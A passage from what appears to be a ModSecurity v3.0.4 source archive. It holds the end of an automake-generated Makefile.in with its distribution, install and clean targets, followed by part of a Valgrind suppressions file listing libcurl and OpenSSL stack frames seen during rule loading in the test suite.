's/[].[^$$\\*]/\\\\&/g'`; \ topsrcdirstrip=`echo "$(top_srcdir)" | sed 's/[].[^$$\\*]/\\\\&/g'`; \ list='$(DISTFILES)'; \ dist_files=`for file in $$list; do echo $$file; done | \ sed -e "s|^$$srcdirstrip/||;t" \ -e "s|^$$topsrcdirstrip/|$(top_builddir)/|;t"`; \ case $$dist_files in \ */*) $(MKDIR_P) `echo "$$dist_files" | \ sed '/\//!d;s|^|$(distdir)/|;s,/[^/]*$$,,' | \ sort -u` ;; \ esac; \ for file in $$dist_files; do \ if test -f $$file || test -d $$file; then d=.; else d=$(srcdir); fi; \ if test -d $$d/$$file; then \ dir=`echo "/$$file" | sed -e 's,/[^/]*$$,,'`; \ if test -d "$(distdir)/$$file"; then \ find "$(distdir)/$$file" -type d ! -perm -700 -exec chmod u+rwx {} \;; \ fi; \ if test -d $(srcdir)/$$file && test $$d != $(srcdir); then \ cp -fpR $(srcdir)/$$file "$(distdir)$$dir" || exit 1; \ find "$(distdir)/$$file" -type d ! -perm -700 -exec chmod u+rwx {} \;; \ fi; \ cp -fpR $$d/$$file "$(distdir)$$dir" || exit 1; \ else \ test -f "$(distdir)/$$file" \ || cp -p $$d/$$file "$(distdir)/$$file" \ || exit 1; \ fi; \ done @list='$(DIST_SUBDIRS)'; for subdir in $$list; do \ if test "$$subdir" = .; then :; else \ $(am__make_dryrun) \ || test -d "$(distdir)/$$subdir" \ || $(MKDIR_P) "$(distdir)/$$subdir" \ || exit 1; \ dir1=$$subdir; dir2="$(distdir)/$$subdir"; \ $(am__relativize); \ new_distdir=$$reldir; \ dir1=$$subdir; dir2="$(top_distdir)"; \ $(am__relativize); \ new_top_distdir=$$reldir; \ echo " (cd $$subdir && $(MAKE) $(AM_MAKEFLAGS) top_distdir="$$new_top_distdir" distdir="$$new_distdir" \\"; \ echo " am__remove_distdir=: am__skip_length_check=: am__skip_mode_fix=: distdir)"; \ ($(am__cd) $$subdir && \ $(MAKE) $(AM_MAKEFLAGS) \ top_distdir="$$new_top_distdir" \ distdir="$$new_distdir" \ am__remove_distdir=: \ am__skip_length_check=: \ am__skip_mode_fix=: \ distdir) \ || exit 1; \ fi; \ done check-am: all-am check: check-recursive all-am: Makefile $(PROGRAMS) $(HEADERS) installdirs: installdirs-recursive installdirs-am: for dir in "$(DESTDIR)$(bindir)"; do \ test -z "$$dir" || $(MKDIR_P) "$$dir"; \ done install: install-recursive install-exec: install-exec-recursive install-data: install-data-recursive uninstall: uninstall-recursive install-am: all-am @$(MAKE) $(AM_MAKEFLAGS) install-exec-am install-data-am installcheck: installcheck-recursive install-strip: if test -z '$(STRIP)'; then \ $(MAKE) $(AM_MAKEFLAGS) INSTALL_PROGRAM="$(INSTALL_STRIP_PROGRAM)" \ install_sh_PROGRAM="$(INSTALL_STRIP_PROGRAM)" INSTALL_STRIP_FLAG=-s \ install; \ else \ $(MAKE) $(AM_MAKEFLAGS) INSTALL_PROGRAM="$(INSTALL_STRIP_PROGRAM)" \ install_sh_PROGRAM="$(INSTALL_STRIP_PROGRAM)" INSTALL_STRIP_FLAG=-s \ "INSTALL_PROGRAM_ENV=STRIPPROG='$(STRIP)'" install; \ fi mostlyclean-generic: clean-generic: -test -z "$(CLEANFILES)" || rm -f $(CLEANFILES) distclean-generic: -test -z "$(CONFIG_CLEAN_FILES)" || rm -f $(CONFIG_CLEAN_FILES) -test . = "$(srcdir)" || test -z "$(CONFIG_CLEAN_VPATH_FILES)" || rm -f $(CONFIG_CLEAN_VPATH_FILES) -rm -f optimization/$(DEPDIR)/$(am__dirstamp) -rm -f optimization/$(am__dirstamp) -rm -f regression/$(DEPDIR)/$(am__dirstamp) -rm -f regression/$(am__dirstamp) -rm -f unit/$(DEPDIR)/$(am__dirstamp) -rm -f unit/$(am__dirstamp) maintainer-clean-generic: @echo "This command is intended for maintainers to use" @echo "it deletes files that may require special tools to rebuild." -test -z "$(MAINTAINERCLEANFILES)" || rm -f $(MAINTAINERCLEANFILES) clean: clean-recursive clean-am: clean-binPROGRAMS clean-generic clean-libtool \ clean-noinstPROGRAMS mostlyclean-am distclean: distclean-recursive -rm -f optimization/$(DEPDIR)/rules_optimization-optimization.Po -rm -f regression/$(DEPDIR)/tests-custom_debug_log.Po -rm -f regression/$(DEPDIR)/tests-regression.Po -rm -f regression/$(DEPDIR)/tests-regression_test.Po -rm -f unit/$(DEPDIR)/tests-unit.Po -rm -f unit/$(DEPDIR)/tests-unit_test.Po -rm -f Makefile distclean-am: clean-am distclean-compile distclean-generic \ distclean-tags dvi: dvi-recursive dvi-am: html: html-recursive html-am: info: info-recursive info-am: install-data-am: install-dvi: install-dvi-recursive install-dvi-am: install-exec-am: install-binPROGRAMS install-html: install-html-recursive install-html-am: install-info: install-info-recursive install-info-am: install-man: install-pdf: install-pdf-recursive install-pdf-am: install-ps: install-ps-recursive install-ps-am: installcheck-am: maintainer-clean: maintainer-clean-recursive -rm -f optimization/$(DEPDIR)/rules_optimization-optimization.Po -rm -f regression/$(DEPDIR)/tests-custom_debug_log.Po -rm -f regression/$(DEPDIR)/tests-regression.Po -rm -f regression/$(DEPDIR)/tests-regression_test.Po -rm -f unit/$(DEPDIR)/tests-unit.Po -rm -f unit/$(DEPDIR)/tests-unit_test.Po -rm -f Makefile maintainer-clean-am: distclean-am maintainer-clean-generic mostlyclean: mostlyclean-recursive mostlyclean-am: mostlyclean-compile mostlyclean-generic \ mostlyclean-libtool pdf: pdf-recursive pdf-am: ps: ps-recursive ps-am: uninstall-am: uninstall-binPROGRAMS .MAKE: $(am__recursive_targets) install-am install-strip .PHONY: $(am__recursive_targets) CTAGS GTAGS TAGS all all-am \ am--depfiles check check-am clean clean-binPROGRAMS \ clean-generic clean-libtool clean-noinstPROGRAMS cscopelist-am \ ctags ctags-am distclean distclean-compile distclean-generic \ distclean-libtool distclean-tags distdir dvi dvi-am html \ html-am info info-am install install-am install-binPROGRAMS \ install-data install-data-am install-dvi install-dvi-am \ install-exec install-exec-am install-html install-html-am \ install-info install-info-am install-man install-pdf \ install-pdf-am install-ps install-ps-am install-strip \ installcheck installcheck-am installdirs installdirs-am \ maintainer-clean maintainer-clean-generic mostlyclean \ mostlyclean-compile mostlyclean-generic mostlyclean-libtool \ pdf pdf-am ps ps-am tags tags-am uninstall uninstall-am \ uninstall-binPROGRAMS .PRECIOUS: Makefile @AFL_FUZZER_TRUE@export MAYBE_AFL_FUZZER = fuzzer # Tell versions [3.59,3.63) of GNU make to not export all variables. # Otherwise a system limit (for SysV at least) may be exceeded. .NOEXPORT: modsecurity-v3.0.4/test/valgrind_suppressions.txt0000644000175000017500000053741513607066010022706 0ustar zimmerlezimmerle{ Memcheck:Cond obj:* obj:* } { Memcheck:Cond obj:/usr/lib/libcurl.so.4.4.0 fun:curl_mvsnprintf obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:____strtol_l_internal fun:_IO_vfscanf fun:__isoc99_vsscanf fun:__isoc99_sscanf obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:_IO_vfscanf fun:__isoc99_vsscanf fun:__isoc99_sscanf obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:bn_mul4x_mont obj:* obj:* obj:* obj:* obj:* obj:* obj:* obj:* obj:* obj:* obj:* obj:* obj:* obj:* obj:* obj:* obj:* obj:* obj:* obj:* obj:* obj:* obj:* obj:* obj:* obj:* obj:* obj:* obj:* } { Memcheck:Value8 fun:bn_mul4x_mont } { Memcheck:Value8 fun:bn_mul4x_mont } { Memcheck:Value8 fun:bn_mul4x_mont } { Memcheck:Value8 fun:bn_mul4x_mont obj:* obj:* obj:* obj:* obj:* obj:* obj:* obj:* obj:* obj:* obj:* obj:* obj:* obj:* obj:* obj:* obj:* obj:* obj:* obj:* obj:* obj:* obj:* obj:* obj:* obj:* obj:* obj:* obj:* } { Memcheck:Value8 fun:BN_from_montgomery_word fun:BN_from_montgomery fun:BN_mod_exp_mont fun:RSA_eay_public_encrypt fun:ssl3_send_client_key_exchange fun:ssl3_connect fun:ssl23_connect obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:BN_from_montgomery_word fun:BN_from_montgomery fun:BN_mod_exp_mont fun:RSA_eay_public_encrypt fun:ssl3_send_client_key_exchange fun:ssl3_connect fun:ssl23_connect obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:BN_from_montgomery_word fun:BN_from_montgomery fun:BN_mod_exp_mont fun:RSA_eay_public_encrypt fun:ssl3_send_client_key_exchange fun:ssl3_connect fun:ssl23_connect obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:BN_num_bits_word fun:BN_num_bits fun:RSA_eay_public_encrypt fun:ssl3_send_client_key_exchange fun:ssl3_connect fun:ssl23_connect obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:BN_num_bits_word fun:BN_num_bits fun:BN_bn2bin fun:RSA_eay_public_encrypt fun:ssl3_send_client_key_exchange fun:ssl3_connect fun:ssl23_connect obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Param write(buf) obj:/usr/lib/libc-2.24.so fun:sock_write fun:BIO_write fun:buffer_ctrl fun:ssl3_connect fun:ssl23_connect obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:aesni_cbc_hmac_sha1_cipher fun:tls1_enc fun:ssl3_read_bytes fun:ssl3_get_message fun:ssl3_get_finished fun:ssl3_connect obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:aesni_cbc_hmac_sha1_cipher fun:tls1_enc fun:ssl3_read_bytes fun:ssl3_get_message fun:ssl3_get_finished fun:ssl3_connect obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:memset fun:BUF_MEM_grow_clean fun:ssl3_get_message fun:ssl3_get_finished fun:ssl3_connect obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:memset fun:BUF_MEM_grow_clean fun:ssl3_get_message fun:ssl3_get_finished fun:ssl3_connect obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:memmove fun:ssl3_read_bytes fun:ssl3_get_message fun:ssl3_get_finished fun:ssl3_connect obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Param write(buf) obj:/usr/lib/libc-2.24.so fun:sock_write fun:BIO_write fun:ssl3_write_pending fun:ssl3_write_bytes obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:aesni_cbc_hmac_sha1_cipher fun:tls1_enc fun:ssl3_read_bytes fun:ssl3_read obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:aesni_cbc_hmac_sha1_cipher fun:tls1_enc fun:ssl3_read_bytes fun:ssl3_read obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:BN_from_montgomery_word fun:BN_from_montgomery fun:BN_mod_exp_mont fun:RSA_eay_public_encrypt fun:ssl3_send_client_key_exchange fun:ssl3_connect fun:ssl23_connect obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:BN_from_montgomery_word fun:BN_from_montgomery fun:BN_mod_exp_mont fun:RSA_eay_public_encrypt fun:ssl3_send_client_key_exchange fun:ssl3_connect fun:ssl23_connect obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity5Utils6IpTree10addFromUrlERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity9operators15IpMatchFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:BN_from_montgomery_word fun:BN_from_montgomery fun:BN_mod_exp_mont fun:RSA_eay_public_encrypt fun:ssl3_send_client_key_exchange fun:ssl3_connect fun:ssl23_connect obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 